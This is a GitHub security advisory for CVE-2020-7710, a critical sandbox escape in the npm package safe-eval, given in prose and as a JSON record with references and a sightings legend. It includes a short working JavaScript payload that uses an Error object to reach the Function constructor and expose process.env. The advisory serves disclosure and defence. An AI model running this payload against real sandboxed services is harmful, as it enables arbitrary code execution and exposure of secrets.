ghsa-hrpq-r399-whgw
Vulnerability from github
Published
2020-08-25 23:40
Modified
2023-09-11 23:01
Severity ?
VLAI Severity ?
Summary
Sandbox Breakout / Arbitrary Code Execution in safe-eval
Details
All versions of safe-eval
are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system.
Evaluating the payload
js
(function (){
var ex = new Error
ex.__proto__ = null
ex.stack = {
match: x => {
return x.constructor.constructor("throw process.env")()
}
}
return ex
})()
prints the contents of process.env
.
Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
{ "affected": [ { "package": { "ecosystem": "npm", "name": "safe-eval" }, "ranges": [ { "events": [ { "introduced": "0" }, { "last_affected": "0.4.1" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2020-7710" ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2020-08-25T21:20:22Z", "nvd_published_at": "2020-08-21T10:15:00Z", "severity": "CRITICAL" }, "details": "All versions of `safe-eval` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system. \n\nEvaluating the payload \n```js\n(function (){\n var ex = new Error\n ex.__proto__ = null\n ex.stack = {\n match: x =\u003e {\n return x.constructor.constructor(\"throw process.env\")()\n }\n }\n return ex\n})()\n``` \n\nprints the contents of `process.env`.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "id": "GHSA-hrpq-r399-whgw", "modified": "2023-09-11T23:01:24Z", "published": "2020-08-25T23:40:53Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7710" }, { "type": "WEB", "url": "https://github.com/hacksparrow/safe-eval/issues/19" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-SAFEEVAL-608076" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1322" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "type": "CVSS_V3" } ], "summary": "Sandbox Breakout / Arbitrary Code Execution in safe-eval" }
Loading…
Loading…
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…